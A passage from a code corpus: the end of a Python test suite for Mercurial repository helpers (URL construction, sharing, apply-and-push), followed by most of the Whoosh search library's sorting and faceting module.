self.assertEquals(get_revisions(self.wc), self.revisions)
open(os.path.join(self.wc, 'test.txt'), 'w').write("hello!")
# Clone the new one
m.vcs_config = {'repo': repo2, 'dest': self.wc}
m.config = {'log_to_console': False}
m.ensure_repo_and_revision()
self.assertEquals(get_revisions(self.wc), get_revisions(repo2))
# Make sure our local file went away
self.failUnless(not os.path.exists(os.path.join(self.wc, 'test.txt')))
finally:
os.environ.clear()
os.environ.update(old_env)
def test_make_hg_url(self):
#construct an hg url specific to revision, branch and filename and try to pull it down
file_url = mercurial.make_hg_url(
"hg.mozilla.org",
'//build/tools/',
revision='FIREFOX_3_6_12_RELEASE',
filename="/lib/python/util/hg.py",
protocol='https',
)
expected_url = "https://hg.mozilla.org/build/tools/raw-file/FIREFOX_3_6_12_RELEASE/lib/python/util/hg.py"
self.assertEquals(file_url, expected_url)
def test_make_hg_url_no_filename(self):
file_url = mercurial.make_hg_url(
"hg.mozilla.org",
"/build/tools",
revision="default",
protocol='https',
)
expected_url = "https://hg.mozilla.org/build/tools/rev/default"
self.assertEquals(file_url, expected_url)
def test_make_hg_url_no_revision_no_filename(self):
repo_url = mercurial.make_hg_url(
"hg.mozilla.org",
"/build/tools",
protocol='https',
)
expected_url = "https://hg.mozilla.org/build/tools"
self.assertEquals(repo_url, expected_url)
def test_make_hg_url_different_protocol(self):
repo_url = mercurial.make_hg_url(
"hg.mozilla.org",
"/build/tools",
protocol='ssh',
)
expected_url = "ssh://hg.mozilla.org/build/tools"
self.assertEquals(repo_url, expected_url)
def test_share_repo(self):
m = get_mercurial_vcs_obj()
repo3 = os.path.join(self.tmpdir, 'repo3')
m.share(self.repodir, repo3)
# make sure shared history is identical
self.assertEquals(self.revisions, get_revisions(repo3))
def test_mercurial_share_outgoing(self):
m = get_mercurial_vcs_obj()
# ensure that outgoing changesets in a shared clone affect the shared history
repo5 = os.path.join(self.tmpdir, 'repo5')
repo6 = os.path.join(self.tmpdir, 'repo6')
m.vcs_config = {'repo': self.repodir, 'dest': repo5}
m.ensure_repo_and_revision()
m.share(repo5, repo6)
open(os.path.join(repo6, 'test.txt'), 'w').write("hello!")
# modify the history of the new clone
m.run_command(HG + ['add', 'test.txt'], cwd=repo6)
m.run_command(HG + ['commit', '-m', 'adding changeset'], cwd=repo6)
self.assertNotEquals(self.revisions, get_revisions(repo6))
self.assertNotEquals(self.revisions, get_revisions(repo5))
self.assertEquals(get_revisions(repo5), get_revisions(repo6))
def test_apply_and_push(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
def c(repo, attempt):
m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
m.apply_and_push(self.wc, self.repodir, c)
self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
def test_apply_and_push_fail(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
def c(repo, attempt, remote):
m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
m.run_command(HG + ['tag', '-f', 'CONFLICTING_TAG'], cwd=remote)
m.config = {'log_to_console': False}
self.assertRaises(errors.VCSException, m.apply_and_push, self.wc,
self.repodir, lambda r, a: c(r, a, self.repodir),
max_attempts=2)
def test_apply_and_push_with_rebase(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
m.config = {'log_to_console': False}
def c(repo, attempt, remote):
m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
if attempt == 1:
m.run_command(HG + ['rm', 'hello.txt'], cwd=remote)
m.run_command(HG + ['commit', '-m', 'test'], cwd=remote)
m.apply_and_push(self.wc, self.repodir,
lambda r, a: c(r, a, self.repodir), max_attempts=2)
self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
def test_apply_and_push_rebase_fails(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
m.config = {'log_to_console': False}
def c(repo, attempt, remote):
m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
if attempt in (1, 2):
m.run_command(HG + ['tag', '-f', 'CONFLICTING_TAG'], cwd=remote)
m.apply_and_push(self.wc, self.repodir,
lambda r, a: c(r, a, self.repodir), max_attempts=4)
self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
def test_apply_and_push_on_branch(self):
m = get_mercurial_vcs_obj()
if m.hg_ver() >= (1, 6, 0):
m.clone(self.repodir, self.wc)
def c(repo, attempt):
m.run_command(HG + ['branch', 'branch3'], cwd=repo)
m.run_command(HG + ['tag', '-f', 'TEST'], cwd=repo)
m.apply_and_push(self.wc, self.repodir, c)
self.assertEquals(get_revisions(self.wc), get_revisions(self.repodir))
def test_apply_and_push_with_no_change(self):
m = get_mercurial_vcs_obj()
m.clone(self.repodir, self.wc)
def c(r, a):
pass
self.assertRaises(errors.VCSException, m.apply_and_push, self.wc, self.repodir, c)
if __name__ == '__main__':
unittest.main()
| mpl-2.0 |
zorroz/microblog | flask/lib/python2.7/site-packages/whoosh/sorting.py | 19 | 41936 | # Copyright 2011 Matt Chaput. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY MATT CHAPUT ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL MATT CHAPUT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are
# those of the authors and should not be interpreted as representing official
# policies, either expressed or implied, of Matt Chaput.
from array import array
from collections import defaultdict
from whoosh.compat import string_type
from whoosh.compat import iteritems, izip, xrange
# Faceting objects
class FacetType(object):
"""Base class for "facets", aspects that can be sorted/faceted.
"""
maptype = None
def categorizer(self, global_searcher):
"""Returns a :class:`Categorizer` corresponding to this facet.
:param global_searcher: A parent searcher. You can use this searcher if
you need global document ID references.
"""
raise NotImplementedError
def map(self, default=None):
t = self.maptype
if t is None:
t = default
if t is None:
return OrderedList()
elif type(t) is type:
return t()
else:
return t
def default_name(self):
return "facet"
class Categorizer(object):
"""Base class for categorizer objects which compute a key value for a
document based on certain criteria, for use in sorting/faceting.
Categorizers are created by FacetType objects through the
:meth:`FacetType.categorizer` method. The
:class:`whoosh.searching.Searcher` object passed to the ``categorizer``
method may be a composite searcher (that is, wrapping a multi-reader), but
categorizers are always run **per-segment**, with segment-relative document
numbers.
The collector will call a categorizer's ``set_searcher`` method as it
searches each segment to let the cateogorizer set up whatever segment-
specific data it needs.
``Collector.allow_overlap`` should be ``True`` if the caller can use the
``keys_for`` method instead of ``key_for`` to group documents into
potentially overlapping groups. The default is ``False``.
If a categorizer subclass can categorize the document using only the
document number, it should set ``Collector.needs_current`` to ``False``
(this is the default) and NOT USE the given matcher in the ``key_for`` or
``keys_for`` methods, since in that case ``segment_docnum`` is not
guaranteed to be consistent with the given matcher. If a categorizer
subclass needs to access information on the matcher, it should set
``needs_current`` to ``True``. This will prevent the caller from using
optimizations that might leave the matcher in an inconsistent state.
"""
allow_overlap = False
needs_current = False
def set_searcher(self, segment_searcher, docoffset):
"""Called by the collector when the collector moves to a new segment.
The ``segment_searcher`` will be atomic. The ``docoffset`` is the
offset of the segment's document numbers relative to the entire index.
You can use the offset to get absolute index docnums by adding the
offset to segment-relative docnums.
"""
pass
def key_for(self, matcher, segment_docnum):
"""Returns a key for the current match.
:param matcher: a :class:`whoosh.matching.Matcher` object. If
``self.needs_current`` is ``False``, DO NOT use this object,
since it may be inconsistent. Use the given ``segment_docnum``
instead.
:param segment_docnum: the segment-relative document number of the
current match.
"""
# Backwards compatibility
if hasattr(self, "key_for_id"):
return self.key_for_id(segment_docnum)
elif hasattr(self, "key_for_matcher"):
return self.key_for_matcher(matcher)
raise NotImplementedError(self.__class__)
def keys_for(self, matcher, segment_docnum):
"""Yields a series of keys for the current match.
This method will be called instead of ``key_for`` if
``self.allow_overlap`` is ``True``.
:param matcher: a :class:`whoosh.matching.Matcher` object. If
``self.needs_current`` is ``False``, DO NOT use this object,
since it may be inconsistent. Use the given ``segment_docnum``
instead.
:param segment_docnum: the segment-relative document number of the
current match.
"""
# Backwards compatibility
if hasattr(self, "keys_for_id"):
return self.keys_for_id(segment_docnum)
raise NotImplementedError(self.__class__)
def key_to_name(self, key):
"""Returns a representation of the key to be used as a dictionary key
in faceting. For example, the sorting key for date fields is a large
integer; this method translates it into a ``datetime`` object to make
the groupings clearer.
"""
return key
# General field facet
class FieldFacet(FacetType):
"""Sorts/facets by the contents of a field.
For example, to sort by the contents of the "path" field in reverse order,
and facet by the contents of the "tag" field::
paths = FieldFacet("path", reverse=True)
tags = FieldFacet("tag")
results = searcher.search(myquery, sortedby=paths, groupedby=tags)
This facet returns different categorizers based on the field type.
"""
def __init__(self, fieldname, reverse=False, allow_overlap=False,
maptype=None):
"""
:param fieldname: the name of the field to sort/facet on.
:param reverse: if True, when sorting, reverse the sort order of this
facet.
:param allow_overlap: if True, when grouping, allow documents to appear
in multiple groups when they have multiple terms in the field.
"""
self.fieldname = fieldname
self.reverse = reverse
self.allow_overlap = allow_overlap
self.maptype = maptype
def default_name(self):
return self.fieldname
def categorizer(self, global_searcher):
# The searcher we're passed here may wrap a multireader, but the
# actual key functions will always be called per-segment following a
# Categorizer.set_searcher method call
fieldname = self.fieldname
fieldobj = global_searcher.schema[fieldname]
# If we're grouping with allow_overlap=True, all we can use is
# OverlappingCategorizer
if self.allow_overlap:
return OverlappingCategorizer(global_searcher, fieldname)
if global_searcher.reader().has_column(fieldname):
coltype = fieldobj.column_type
if coltype.reversible or not self.reverse:
c = ColumnCategorizer(global_searcher, fieldname, self.reverse)
else:
c = ReversedColumnCategorizer(global_searcher, fieldname)
else:
c = PostingCategorizer(global_searcher, fieldname,
self.reverse)
return c
class ColumnCategorizer(Categorizer):
def __init__(self, global_searcher, fieldname, reverse=False):
self._fieldname = fieldname
self._fieldobj = global_searcher.schema[self._fieldname]
self._column_type = self._fieldobj.column_type
self._reverse = reverse
# The column reader is set in set_searcher() as we iterate over the
# sub-searchers
self._creader = None
def __repr__(self):
return "%s(%r, %r, reverse=%r)" % (self.__class__.__name__,
self._fieldobj, self._fieldname,
self._reverse)
def set_searcher(self, segment_searcher, docoffset):
r = segment_searcher.reader()
self._creader = r.column_reader(self._fieldname,
reverse=self._reverse,
translate=False)
def key_for(self, matcher, segment_docnum):
return self._creader.sort_key(segment_docnum)
def key_to_name(self, key):
return self._fieldobj.from_column_value(key)
class ReversedColumnCategorizer(ColumnCategorizer):
"""Categorizer that reverses column values for columns that aren't
naturally reversible.
"""
def __init__(self, global_searcher, fieldname):
ColumnCategorizer.__init__(self, global_searcher, fieldname)
reader = global_searcher.reader()
self._doccount = reader.doc_count_all()
global_creader = reader.column_reader(fieldname, translate=False)
self._values = sorted(set(global_creader))
def key_for(self, matcher, segment_docnum):
value = self._creader[segment_docnum]
order = self._values.index(value)
# Subtract from 0 to reverse the order
return 0 - order
def key_to_name(self, key):
# Re-reverse the key to get the index into _values
key = self._values[0 - key]
return ColumnCategorizer.key_to_name(self, key)
class OverlappingCategorizer(Categorizer):
allow_overlap = True
def __init__(self, global_searcher, fieldname):
self._fieldname = fieldname
self._fieldobj = global_searcher.schema[fieldname]
field = global_searcher.schema[fieldname]
reader = global_searcher.reader()
self._use_vectors = bool(field.vector)
self._use_column = (reader.has_column(fieldname)
and field.column_type.stores_lists())
# These are set in set_searcher() as we iterate over the sub-searchers
self._segment_searcher = None
self._creader = None
self._lists = None
def set_searcher(self, segment_searcher, docoffset):
fieldname = self._fieldname
self._segment_searcher = segment_searcher
reader = segment_searcher.reader()
if self._use_vectors:
pass
elif self._use_column:
self._creader = reader.column_reader(fieldname, translate=False)
else:
# Otherwise, cache the values in each document in a huge list
# of lists
dc = segment_searcher.doc_count_all()
field = segment_searcher.schema[fieldname]
from_bytes = field.from_bytes
self._lists = [[] for _ in xrange(dc)]
for btext in field.sortable_terms(reader, fieldname):
text = from_bytes(btext)
postings = reader.postings(fieldname, btext)
for docid in postings.all_ids():
self._lists[docid].append(text)
def keys_for(self, matcher, docid):
if self._use_vectors:
try:
v = self._segment_searcher.vector(docid, self._fieldname)
return list(v.all_ids())
except KeyError:
return []
elif self._use_column:
return self._creader[docid]
else:
return self._lists[docid] or [None]
def key_for(self, matcher, docid):
if self._use_vectors:
try:
v = self._segment_searcher.vector(docid, self._fieldname)
return v.id()
except KeyError:
return None
elif self._use_column:
return self._creader.sort_key(docid)
else:
ls = self._lists[docid]
if ls:
return ls[0]
else:
return None
class PostingCategorizer(Categorizer):
"""
Categorizer for fields that don't store column values. This is very
inefficient. Instead of relying on this categorizer you should plan for
which fields you'll want to sort on and set ``sortable=True`` in their
field type.
This object builds an array caching the order of all documents according to
the field, then uses the cached order as a numeric key. This is useful when
a field cache is not available, and also for reversed fields (since field
cache keys for non- numeric fields are arbitrary data, it's not possible to
"negate" them to reverse the sort order).
"""
def __init__(self, global_searcher, fieldname, reverse):
self.reverse = reverse
if fieldname in global_searcher._field_caches:
self.values, self.array = global_searcher._field_caches[fieldname]
else:
# Cache the relative positions of all docs with the given field
# across the entire index
reader = global_searcher.reader()
dc = reader.doc_count_all()
self._fieldobj = global_searcher.schema[fieldname]
from_bytes = self._fieldobj.from_bytes
self.values = []
self.array = array("i", [dc + 1] * dc)
btexts = self._fieldobj.sortable_terms(reader, fieldname)
for i, btext in enumerate(btexts):
self.values.append(from_bytes(btext))
# Get global docids from global reader
postings = reader.postings(fieldname, btext)
for docid in postings.all_ids():
self.array[docid] = i
global_searcher._field_caches[fieldname] = (self.values, self.array)
def set_searcher(self, segment_searcher, docoffset):
self._searcher = segment_searcher
self.docoffset = docoffset
def key_for(self, matcher, segment_docnum):
global_docnum = self.docoffset + segment_docnum
i = self.array[global_docnum]
if self.reverse:
i = len(self.values) - i
return i
def key_to_name(self, i):
if i >= len(self.values):
return None
if self.reverse:
i = len(self.values) - i
return self.values[i]
# Special facet types
class QueryFacet(FacetType):
"""Sorts/facets based on the results of a series of queries.
"""
def __init__(self, querydict, other=None, allow_overlap=False,
maptype=None):
"""
:param querydict: a dictionary mapping keys to
:class:`whoosh.query.Query` objects.
:param other: the key to use for documents that don't match any of the
queries.
"""
self.querydict = querydict
self.other = other
self.maptype = maptype
self.allow_overlap = allow_overlap
def categorizer(self, global_searcher):
return self.QueryCategorizer(self.querydict, self.other, self.allow_overlap)
class QueryCategorizer(Categorizer):
def __init__(self, querydict, other, allow_overlap=False):
self.querydict = querydict
self.other = other
self.allow_overlap = allow_overlap
def set_searcher(self, segment_searcher, offset):
self.docsets = {}
for qname, q in self.querydict.items():
docset = set(q.docs(segment_searcher))
if docset:
self.docsets[qname] = docset
self.offset = offset
def key_for(self, matcher, docid):
for qname in self.docsets:
if docid in self.docsets[qname]:
return qname
return self.other
def keys_for(self, matcher, docid):
found = False
for qname in self.docsets:
if docid in self.docsets[qname]:
yield qname
found = True
if not found:
yield None
class RangeFacet(QueryFacet):
"""Sorts/facets based on numeric ranges. For textual ranges, use
:class:`QueryFacet`.
For example, to facet the "price" field into $100 buckets, up to $1000::
prices = RangeFacet("price", 0, 1000, 100)
results = searcher.search(myquery, groupedby=prices)
The ranges/buckets are always **inclusive** at the start and **exclusive**
at the end.
"""
def __init__(self, fieldname, start, end, gap, hardend=False,
maptype=None):
"""
:param fieldname: the numeric field to sort/facet on.
:param start: the start of the entire range.
:param end: the end of the entire range.
:param gap: the size of each "bucket" in the range. This can be a
sequence of sizes. For example, ``gap=[1,5,10]`` will use 1 as the
size of the first bucket, 5 as the size of the second bucket, and
10 as the size of all subsequent buckets.
:param hardend: if True, the end of the last bucket is clamped to the
value of ``end``. If False (the default), the last bucket is always
``gap`` sized, even if that means the end of the last bucket is
after ``end``.
"""
self.fieldname = fieldname
self.start = start
self.end = end
self.gap = gap
self.hardend = hardend
self.maptype = maptype
self._queries()
def default_name(self):
return self.fieldname
def _rangetype(self):
from whoosh import query
return query.NumericRange
def _range_name(self, startval, endval):
return (startval, endval)
def _queries(self):
if not self.gap:
raise Exception("No gap secified (%r)" % self.gap)
if isinstance(self.gap, (list, tuple)):
gaps = self.gap
gapindex = 0
else:
gaps = [self.gap]
gapindex = -1
rangetype = self._rangetype()
self.querydict = {}
cstart = self.start
while cstart < self.end:
thisgap = gaps[gapindex]
if gapindex >= 0:
gapindex += 1
if gapindex == len(gaps):
gapindex = -1
cend = cstart + thisgap
if self.hardend:
cend = min(self.end, cend)
rangename = self._range_name(cstart, cend)
q = rangetype(self.fieldname, cstart, cend, endexcl=True)
self.querydict[rangename] = q
cstart = cend
def categorizer(self, global_searcher):
return QueryFacet(self.querydict).categorizer(global_searcher)
class DateRangeFacet(RangeFacet):
"""Sorts/facets based on date ranges. This is the same as RangeFacet
except you are expected to use ``daterange`` objects as the start and end
of the range, and ``timedelta`` or ``relativedelta`` objects as the gap(s),
and it generates :class:`~whoosh.query.DateRange` queries instead of
:class:`~whoosh.query.TermRange` queries.
For example, to facet a "birthday" range into 5 year buckets::
from datetime import datetime
from whoosh.support.relativedelta import relativedelta
startdate = datetime(1920, 0, 0)
enddate = datetime.now()
gap = relativedelta(years=5)
bdays = DateRangeFacet("birthday", startdate, enddate, gap)
results = searcher.search(myquery, groupedby=bdays)
The ranges/buckets are always **inclusive** at the start and **exclusive**
at the end.
"""
def _rangetype(self):
from whoosh import query
return query.DateRange
class ScoreFacet(FacetType):
"""Uses a document's score as a sorting criterion.
For example, to sort by the ``tag`` field, and then within that by relative
score::
tag_score = MultiFacet(["tag", ScoreFacet()])
results = searcher.search(myquery, sortedby=tag_score)
"""
def categorizer(self, global_searcher):
return self.ScoreCategorizer(global_searcher)
class ScoreCategorizer(Categorizer):
needs_current = True
def __init__(self, global_searcher):
w = global_searcher.weighting
self.use_final = w.use_final
if w.use_final:
self.final = w.final
def set_searcher(self, segment_searcher, offset):
self.segment_searcher = segment_searcher
def key_for(self, matcher, docid):
score = matcher.score()
if self.use_final:
score = self.final(self.segment_searcher, docid, score)
# Negate the score so higher values sort first
return 0 - score
class FunctionFacet(FacetType):
"""This facet type is low-level. In most cases you should use
:class:`TranslateFacet` instead.
This facet type ets you pass an arbitrary function that will compute the
key. This may be easier than subclassing FacetType and Categorizer to set up
the desired behavior.
The function is called with the arguments ``(searcher, docid)``, where the
``searcher`` may be a composite searcher, and the ``docid`` is an absolute
index document number (not segment-relative).
For example, to use the number of words in the document's "content" field
as the sorting/faceting key::
fn = lambda s, docid: s.doc_field_length(docid, "content")
lengths = FunctionFacet(fn)
"""
def __init__(self, fn, maptype=None):
self.fn = fn
self.maptype = maptype
def categorizer(self, global_searcher):
return self.FunctionCategorizer(global_searcher, self.fn)
class FunctionCategorizer(Categorizer):
def __init__(self, global_searcher, fn):
self.global_searcher = global_searcher
self.fn = fn
def set_searcher(self, segment_searcher, docoffset):
self.offset = docoffset
def key_for(self, matcher, docid):
return self.fn(self.global_searcher, docid + self.offset)
class TranslateFacet(FacetType):
"""Lets you specify a function to compute the key based on a key generated
by a wrapped facet.
This is useful if you want to use a custom ordering of a sortable field. For
example, if you want to use an implementation of the Unicode Collation
Algorithm (UCA) to sort a field using the rules from a particular language::
from pyuca import Collator
# The Collator object has a sort_key() method which takes a unicode
# string and returns a sort key
c = Collator("allkeys.txt")
# Make a facet object for the field you want to sort on
facet = sorting.FieldFacet("name")
# Wrap the facet in a TranslateFacet with the translation function
# (the Collator object's sort_key method)
facet = sorting.TranslateFacet(c.sort_key, facet)
# Use the facet to sort the search results
results = searcher.search(myquery, sortedby=facet)
You can pass multiple facets to the
"""
def __init__(self, fn, *facets):
"""
:param fn: The function to apply. For each matching document, this
function will be called with the values of the given facets as
arguments.
:param facets: One or more :class:`FacetType` objects. These facets are
used to compute facet value(s) for a matching document, and then the
value(s) is/are passed to the function.
"""
self.fn = fn
self.facets = facets
self.maptype = None
def categorizer(self, global_searcher):
catters = [facet.categorizer(global_searcher) for facet in self.facets]
return self.TranslateCategorizer(self.fn, catters)
class TranslateCategorizer(Categorizer):
def __init__(self, fn, catters):
self.fn = fn
self.catters = catters
def set_searcher(self, segment_searcher, docoffset):
for catter in self.catters:
catter.set_searcher(segment_searcher, docoffset)
def key_for(self, matcher, segment_docnum):
keys = [catter.key_for(matcher, segment_docnum)
for catter in self.catters]
return self.fn(*keys)
class StoredFieldFacet(FacetType):
"""Lets you sort/group using the value in an unindexed, stored field (e.g.
:class:`whoosh.fields.STORED`). This is usually slower than using an indexed
field.
For fields where the stored value is a space-separated list of keywords,
(e.g. ``"tag1 tag2 tag3"``), you can use the ``allow_overlap`` keyword
argument to allow overlapped faceting on the result of calling the
``split()`` method on the field value (or calling a custom split function
if one is supplied).
"""
def __init__(self, fieldname, allow_overlap=False, split_fn=None,
maptype=None):
"""
:param fieldname: the name of the stored field.
:param allow_overlap: if True, when grouping, allow documents to appear
in multiple groups when they have multiple terms in the field. The
categorizer uses ``string.split()`` or the custom ``split_fn`` to
convert the stored value into a list of facet values.
:param split_fn: a custom function to split a stored field value into
multiple facet values when ``allow_overlap`` is True. If not
supplied, the categorizer simply calls the value's ``split()``
method.
"""
self.fieldname = fieldname
self.allow_overlap = allow_overlap
self.split_fn = split_fn
self.maptype = maptype
def default_name(self):
return self.fieldname
def categorizer(self, global_searcher):
return self.StoredFieldCategorizer(self.fieldname, self.allow_overlap,
self.split_fn)
class StoredFieldCategorizer(Categorizer):
def __init__(self, fieldname, allow_overlap, split_fn):
self.fieldname = fieldname
self.allow_overlap = allow_overlap
self.split_fn = split_fn
def set_searcher(self, segment_searcher, docoffset):
self.segment_searcher = segment_searcher
def keys_for(self, matcher, docid):
d = self.segment_searcher.stored_fields(docid)
value = d.get(self.fieldname)
if self.split_fn:
return self.split_fn(value)
else:
return value.split()
def key_for(self, matcher, docid):
d = self.segment_searcher.stored_fields(docid)
return d.get(self.fieldname)
class MultiFacet(FacetType):
"""Sorts/facets by the combination of multiple "sub-facets".
For example, to sort by the value of the "tag" field, and then (for
documents where the tag is the same) by the value of the "path" field::
facet = MultiFacet(FieldFacet("tag"), FieldFacet("path")
results = searcher.search(myquery, sortedby=facet)
As a shortcut, you can use strings to refer to field names, and they will
be assumed to be field names and turned into FieldFacet objects::
facet = MultiFacet("tag", "path")
You can also use the ``add_*`` methods to add criteria to the multifacet::
facet = MultiFacet()
facet.add_field("tag")
facet.add_field("path", reverse=True)
facet.add_query({"a-m": TermRange("name", "a", "m"),
"n-z": TermRange("name", "n", "z")})
"""
def __init__(self, items=None, maptype=None):
self.facets = []
if items:
for item in items:
self._add(item)
self.maptype = maptype
def __repr__(self):
return "%s(%r, %r)" % (self.__class__.__name__,
self.facets,
self.maptype)
@classmethod
def from_sortedby(cls, sortedby):
multi = cls()
if isinstance(sortedby, string_type):
multi._add(sortedby)
elif (isinstance(sortedby, (list, tuple))
or hasattr(sortedby, "__iter__")):
for item in sortedby:
multi._add(item)
else:
multi._add(sortedby)
return multi
def _add(self, item):
if isinstance(item, FacetType):
self.add_facet(item)
elif isinstance(item, string_type):
self.add_field(item)
else:
raise Exception("Don't know what to do with facet %r" % (item,))
def add_field(self, fieldname, reverse=False):
self.facets.append(FieldFacet(fieldname, reverse=reverse))
return self
def add_query(self, querydict, other=None, allow_overlap=False):
self.facets.append(QueryFacet(querydict, other=other,
allow_overlap=allow_overlap))
return self
def add_score(self):
self.facets.append(ScoreFacet())
return self
def add_facet(self, facet):
if not isinstance(facet, FacetType):
raise TypeError("%r is not a facet object, perhaps you meant "
"add_field()" % (facet,))
self.facets.append(facet)
return self
def categorizer(self, global_searcher):
if not self.facets:
raise Exception("No facets")
elif len(self.facets) == 1:
catter = self.facets[0].categorizer(global_searcher)
else:
catter = self.MultiCategorizer([facet.categorizer(global_searcher)
for facet in self.facets])
return catter
class MultiCategorizer(Categorizer):
def __init__(self, catters):
self.catters = catters
@property
def needs_current(self):
return any(c.needs_current for c in self.catters)
def set_searcher(self, segment_searcher, docoffset):
for catter in self.catters:
catter.set_searcher(segment_searcher, docoffset)
def key_for(self, matcher, docid):
return tuple(catter.key_for(matcher, docid)
for catter in self.catters)
def key_to_name(self, key):
return tuple(catter.key_to_name(keypart)
for catter, keypart
in izip(self.catters, key))
class Facets(object):
"""Maps facet names to :class:`FacetType` objects, for creating multiple
groupings of documents.
For example, to group by tag, and **also** group by price range::
facets = Facets()
facets.add_field("tag")
facets.add_facet("price", RangeFacet("price", 0, 1000, 100))
results = searcher.search(myquery, groupedby=facets)
tag_groups = results.groups("tag")
price_groups = results.groups("price")
(To group by the combination of multiple facets, use :class:`MultiFacet`.)
"""
def __init__(self, x=None):
self.facets = {}
if x:
self.add_facets(x)
@classmethod
def from_groupedby(cls, groupedby):
facets = cls()
if isinstance(groupedby, (cls, dict)):
facets.add_facets(groupedby)
elif isinstance(groupedby, string_type):
facets.add_field(groupedby)
elif isinstance(groupedby, FacetType):
facets.add_facet(groupedby.default_name(), groupedby)
elif isinstance(groupedby, (list, tuple)):
for item in groupedby:
facets.add_facets(cls.from_groupedby(item))
else:
raise Exception("Don't know what to do with groupedby=%r"
% groupedby)
return facets
def names(self):
"""Returns an iterator of the facet names in this object.
"""
return iter(self.facets)
def items(self):
"""Returns a list of (facetname, facetobject) tuples for the facets in
this object.
"""
return self.facets.items()
def add_field(self, fieldname, **kwargs):
"""Adds a :class:`FieldFacet` for the given field name (the field name
is automatically used as the facet name).
"""
self.facets[fieldname] = FieldFacet(fieldname, **kwargs)
return self
def add_query(self, name, querydict, **kwargs):
"""Adds a :class:`QueryFacet` under the given ``name``.
:param name: a name for the facet.
:param querydict: a dictionary mapping keys to
:class:`whoosh.query.Query` objects.
"""
self.facets[name] = QueryFacet(querydict, **kwargs)
return self
def add_facet(self, name, facet):
"""Adds a :class:`FacetType` object under the given ``name``.
"""
if not isinstance(facet, FacetType):
raise Exception("%r:%r is not a facet" % (name, facet))
self.facets[name] = facet
return self
def add_facets(self, facets, replace=True):
"""Adds the contents of the given ``Facets`` or ``dict`` object to this
object.
"""
if not isinstance(facets, (dict, Facets)):
raise Exception("%r is not a Facets object or dict" % facets)
for name, facet in facets.items():
if replace or name not in self.facets:
self.facets[name] = facet
return self
# Objects for holding facet groups
class FacetMap(object):
"""Base class for objects holding the results of grouping search results by
a Facet. Use an object's ``as_dict()`` method to access the results.
You can pass a subclass of this to the ``maptype`` keyword argument when
creating a ``FacetType`` object to specify what information the facet
should record about the group. For example::
# Record each document in each group in its sorted order
myfacet = FieldFacet("size", maptype=OrderedList)
# Record only the count of documents in each group
myfacet = FieldFacet("size", maptype=Count)
"""
def add(self, groupname, docid, sortkey):
"""Adds a document to the facet results.
:param groupname: the name of the group to add this document to.
:param docid: the document number of the document to add.
:param sortkey: a value representing the sort position of the document
in the full results.
"""
raise NotImplementedError
def as_dict(self):
"""Returns a dictionary object mapping group names to
implementation-specific values. For example, the value might be a list
of document numbers, or a integer representing the number of documents
in the group.
"""
raise NotImplementedError
class OrderedList(FacetMap):
"""Stores a list of document numbers for each group, in the same order as
they appear in the search results.
The ``as_dict`` method returns a dictionary mapping group names to lists
of document numbers.
"""
def __init__(self):
self.dict = defaultdict(list)
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.dict)
def add(self, groupname, docid, sortkey):
self.dict[groupname].append((sortkey, docid))
def as_dict(self):
d = {}
for key, items in iteritems(self.dict):
d[key] = [docnum for _, docnum in sorted(items)]
return d
class UnorderedList(FacetMap):
"""Stores a list of document numbers for each group, in arbitrary order.
This is slightly faster and uses less memory than
:class:`OrderedListResult` if you don't care about the ordering of the
documents within groups.
The ``as_dict`` method returns a dictionary mapping group names to lists
of document numbers.
"""
def __init__(self):
self.dict = defaultdict(list)
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.dict)
def add(self, groupname, docid, sortkey):
self.dict[groupname].append(docid)
def as_dict(self):
return dict(self.dict)
class Count(FacetMap):
"""Stores the number of documents in each group.
The ``as_dict`` method returns a dictionary mapping group names to
integers.
"""
def __init__(self):
self.dict = defaultdict(int)
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.dict)
def add(self, groupname, docid, sortkey):
self.dict[groupname] += 1
def as_dict(self):
return dict(self.dict)
class Best(FacetMap):
"""Stores the "best" document in each group (that is, the one with the
highest sort key).
The ``as_dict`` method returns a dictionary mapping group names to
docnument numbers.
"""
def __init__(self):
self.bestids = {}
self.bestkeys = {}
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.bestids)
def add(self, groupname, docid, sortkey):
if groupname not in self.bestids or sortkey < self.bestkeys[groupname]:
self.bestids[groupname] = docid
self.bestkeys[groupname] = sortkey
def as_dict(self):
return self.bestids
# Helper functions
def add_sortable(writer, fieldname, facet, column=None):
"""Adds a per-document value column to an existing field which was created
without the ``sortable`` keyword argument.
